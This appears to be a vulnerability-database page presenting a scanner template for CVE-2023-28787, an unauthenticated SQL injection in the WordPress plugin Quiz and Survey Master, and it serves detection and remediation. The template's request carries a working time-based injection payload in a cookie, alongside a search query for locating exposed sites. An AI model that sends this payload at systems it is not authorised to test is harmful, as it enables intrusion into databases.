Quiz and Survey Master <= 8.1.4 - SQL Injection
CVE-2023-28787
Verified
Description
ExpressTech Quiz And Survey Master (versions up to 8.1.4) contains an SQL injection caused by improper neutralization of special elements used in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires user interaction.
Severity
Critical
CVSS Score
8.6
Exploit Probability
2%
Published Date
February 6, 2026
Template Author
shivam kamboj
CVE-2023-28787.yaml
id: CVE-2023-28787
info:
name: Quiz and Survey Master <= 8.1.4 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
ExpressTech Quiz And Survey Master (versions up to 8.1.4) contains an SQL injection caused by improper neutralization of special elements used in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires user interaction.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
remediation: |
Update to the latest version of Quiz And Survey Master that addresses this vulnerability.
reference:
- https://patchstack.com/articles/critical-unauthenticated-sql-injection-in-quiz-and-survey-master/
- https://patchstack.com/database/wordpress/plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-8-1-4-unauthenticated-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-28787
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2023-28787
cwe-id: CWE-89
epss-score: 0.0196
epss-percentile: 0.78094
metadata:
verified: true
max-request: 1
fofa-query: body="/quiz-master-next"
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,quiz-master-next,qsm
http:
- raw:
- |
@timeout: 30s
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: question_ids_1=1) AND SLEEP(8)-- -
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'status_code == 200'
- 'contains_all(body, "quiz-master-next", "qsm_")'
condition: and
# digest: 4a0a00473045022100d7192e4d487518a04e81d0d7a8d17815aed0eb54902273f4fdd202e23fe92298022017a6a023309190627c3da4ad9387d35deeeb5029c2a996dd6c4a057ed79e78a1:922c64590222798bb761d5b6d8e729508.6Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
cve-2023-28787
CWE ID:
cwe-89
References
https://patchstack.com/articles/critical-unauthenticated-sql-injection-in-quiz-and-survey-master/https://patchstack.com/database/wordpress/plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-8-1-4-unauthenticated-sql-injection-vulnerabilityhttps://nvd.nist.gov/vuln/detail/CVE-2023-28787
Remediation Steps
Update to the latest version of Quiz And Survey Master that addresses this vulnerability.